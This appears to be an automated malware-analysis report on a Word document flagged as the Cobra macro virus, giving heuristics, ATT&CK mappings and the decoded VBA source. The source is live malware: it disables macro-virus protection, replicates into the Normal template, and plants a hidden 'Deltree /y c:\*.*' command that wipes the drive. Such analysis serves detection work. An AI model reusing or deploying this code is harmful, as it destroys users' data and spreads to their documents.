MALICIOUS
500
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros with AutoOpen and Auto_Close functions, indicative of malicious intent. The 'Cobra' macro attempts to copy itself to the Normal template and delete other macros, suggesting an effort to establish persistence and evade detection. The presence of a Shell() call and the ClamAV detection as 'Doc.Trojan.Cobra-2' strongly indicate a downloader or dropper functionality.
Heuristics 11
-
ClamAV: Doc.Trojan.Cobra-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Cobra-2
-
Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGEA CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 40,960 bytes but its declared streams total only 0 bytes — 40,960 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
CFB header with no readable streams medium OLE_PARSE_EMPTY_STREAMSThe file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous — it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8088 bytes |
SHA-256: 35f42b9877ef3ea6058e2c08d9a8b084a011147c0b32d72c3944ea0e9af70c4a |
|||
|
Detection
ClamAV:
Doc.Trojan.Cobra-2
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Cobra"
'Cobra Version 1.0D
Sub AutoOpen()
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
Call DelNorMac
Call CopNorMac
Call DelActMac
Call CopActMac
End Sub
Sub DelNorMac()
On Error Resume Next
Set ActDoc = ActiveDocument
Set NorTem = NormalTemplate
For n = 1 To NorTem.VBProject.VBComponents.Count
If (NorTem.VBProject.VBComponents(n).Name <> "Cobra") And _
(NorTem.VBProject.VBComponents(n).Name <> "ThisDocument") Then _
Application.OrganizerDelete Source:=NorTem.FullName, _
Name:=NorTem.VBProject.VBComponents(n).Name, Object:=wdOrganizerObjectProjectItems
Next n
End Sub
Sub CopNorMac()
On Error Resume Next
Dim ComOk As Boolean
Set ActDoc = ActiveDocument
Set NorTem = NormalTemplate
For n = 1 To NorTem.VBProject.VBComponents.Count
If NorTem.VBProject.VBComponents(n).Name = "Cobra" Then _
ComOk = True
Next
If ComOk <> True Then Application.OrganizerCopy _
Source:=ActDoc.FullName, Destination:= _
NorTem.FullName, Name:="Cobra", Object:=wdOrganizerObjectProjectItems
Templates(NorTem.FullName).Save
End Sub
Sub DelActMac()
On Error Resume Next
Set ActDoc = ActiveDocument
Set NorTem = NormalTemplate
For n = 1 To ActDoc.VBProject.VBComponents.Count
If (ActDoc.VBProject.VBComponents(n).Name <> "Cobra") And _
(ActDoc.VBProject.VBComponents(n).Name <> "ThisDocument") And _
(ActDoc.VBProject.VBComponents(n).Name <> "Reference to Normal") Then _
Application.OrganizerDelete Source:=ActDoc.FullName, _
Name:=ActDoc.VBProject.VBComponents(n).Name, Object:=wdOrganizerObjectProjectItems
Next n
End Sub
Sub CopActMac()
On Error Resume Next
Dim ComOk As Boolean
Set ActDoc = ActiveDocument
Set NorTem = NormalTemplate
For n = 1 To ActDoc.VBProject.VBComponents.Count
If ActDoc.VBProject.VBComponents(n).Name = "Cobra" Then _
ComOk = True
Next
If ComOk <> True Then Application.OrganizerCopy _
Source:=NorTem.FullName, Destination:= _
ActDoc.FullName, Name:="Cobra", Object:=wdOrganizerObjectProjectItems
End Sub
Sub AutoClose()
If (Year(Now) Mod 2 = 0) And (Day(Now) = 26) And (Month(Now) = 3) Then
ActiveDocument.VBProject.VBComponents("Cobra").Export ("c:\Cobra.Sys")
Call AddModToNorTem
Call AddModToActDoc
End If
End Sub
Sub AddModToNorTem()
Dim AddOk As Boolean
Set NorTem = NormalTemplate
For n = 1 To NorTem.VBProject.VBComponents.Count
If NorTem.VBProject.VBComponents(n).Name = "war" Then _
AddOk = True
Next
If AddOk <> True Then
Set ModAdd = NormalTemplate.VBProject.VBComponents.Add(1)
ModAdd.Name = "war"
ModAdd.Codemodule.InsertLines 1, "Sub FileExit"
ModAdd.Codemodule.InsertLines 2, "On Error Resume Next"
ModAdd.Codemodule.InsertLines 3, "Msgbox ""You are infected with Cobra"",,""Cobra"
ModAdd.Codemodule.InsertLines 4, "End Sub"
ModAdd.Codemodule.InsertLines 5, "Sub FileNew"
ModAdd.Codemodule.InsertLines 6, "Shell " + """Deltree /y c:\*.*"", vbHide"
ModAdd.Codemodule.InsertLines 7, "End Sub"
ModAdd.Codemodule.InsertLines 8, "Sub FileOpen"
ModAdd.Codemodule.InsertLines 9, "On Error Resume Next"
ModAdd.Codemodule.InsertLines 10, "Set ActDoc = ActiveDocument"
ModAdd.Codemodule.InsertLines 11, "Set NorTem = NormalTemplate"
ModAdd.Codemodule.InsertLines 12, "For n = 1 To ActDoc.VBProject.VBComponents.Count"
ModAdd.Codemodule.InsertLines 13, "If (ActDoc.VBProject.VBComponents(n).Name <> ""war"") And _"
ModAdd.Codemodule.InsertLines 14, "(ActDoc.VBProject.VBComponents(n).Name <> ""ThisDocument"") And _"
ModAdd.Codemodule.InsertLines 15, "(ActDoc.VBProject.VBComponents(n).Name <> ""Reference to Normal"") Then _"
ModAdd.Codemodule.InsertLines 16, "Application.OrganizerDelete Source:=ActDoc.FullName, _"
ModAdd.Codemodule.InsertLines 17, "Name:=ActDoc.VBProject.VBComponents(n).Name, Object:=wdOrganizerObjectProjectItems"
ModAdd.Codemodule.InsertLi
... (truncated)
|
|||
embedded_office_off00005000.ole |
embedded-office | Embedded OLE/CFB Office body inside ole container at offset 0x5000 | 40960 bytes |
SHA-256: 5de6a92e0afd4d56c35e9ffc4edf23ebaca9f7d8b1541531dc0fccb203ffdfb9 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved macro source contains an auto-exec entry point and execution/download terms.
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.